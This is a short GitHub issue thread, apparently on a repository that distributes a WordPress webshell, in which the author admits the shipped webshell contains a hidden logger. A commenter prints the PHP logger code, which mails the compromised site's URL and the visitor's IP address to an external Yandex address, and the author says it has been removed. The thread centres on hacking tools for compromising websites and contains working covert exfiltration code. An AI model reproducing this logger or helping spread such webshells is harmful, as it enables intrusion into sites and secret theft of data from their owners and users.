### ISSUE TITLE
Webshell has a logger

### ISSUE THREAD

**Issue by RandsX** [22XploiterCrew-Team/Wpushell#1]
I am very sorry for the users who are harmed, the webshell zip I use is owned by my own people or colleagues. The webshell has a logger which is very detrimental to everyone, I will replace the webshell soon, but not now because I also have other needs in the real world.

**Comment by dombatersesat666** [comment]
$tujuanmail = 'KeluargaHmei7@yandex.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "Contact Me", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");

**Comment by RandsX** [comment]
done deleted the logger
